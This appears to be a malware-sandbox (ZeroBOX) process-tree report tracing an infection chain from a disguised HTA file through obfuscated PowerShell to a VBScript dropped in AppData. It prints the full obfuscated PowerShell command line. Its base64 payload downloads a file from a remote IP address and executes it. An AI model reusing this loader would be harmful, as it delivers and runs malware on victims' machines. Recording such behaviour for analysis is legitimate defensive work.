| ZeroBOX

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\nicewithgreatpcitureofgreatthingstobe.hta.html
2616
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2616 CREDAT:145409
  2704
  - poWeRshELl.exe "C:\Windows\sysTem32\WInDowsPOWErshelL\v1.0\poWeRshELl.exe" "POWerShell.Exe -ex byPAss -nOp -w 1 -c DEVIceCreDEnTiALDepLOymeNT.EXE ; IeX($(Iex('[SYStEm.tExt.eNcoDinG]'+[chaR]0X3A+[char]58+'UTF8.GetstrinG([sYstem.ConvErT]'+[CHar]0X3A+[char]58+'fRoMbaSE64sTrinG('+[char]34+'JENCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFckRlZklOSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhwYUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGemRDSmF6SixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENBVix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWTyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJuY1VRZVopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidWwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLZFZpWGxjcWdhWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJENCOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjIzLzQ1Ny9zZWV0aGViZXN0cGljdHVyZXdpdGhiZXN0eWVleWVzdG9nZXRtZS50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoYmVzdHllZXllc3RvZ2V0LnZiUyIsMCwwKTtzdGFSVC1TbEVFUCgzKTtTVGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzZWV0aGViZXN0cGljdHVyZXdpdGhiZXN0eWVleWVzdG9nZXQudmJTIg=='+[ChaR]0X22+'))')))"
    2948
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex byPAss -nOp -w 1 -c DEVIceCreDEnTiALDepLOymeNT.EXE
      2432
    - csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\hf2c9taf.cmdline"
      2316
      - cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES1D91.tmp" "c:\Users\test22\AppData\Local\Temp\CSC1D23.tmp"
        1736
    - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Roaming\seethebestpicturewithbestyeeyestoget.vbS"
      2104

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents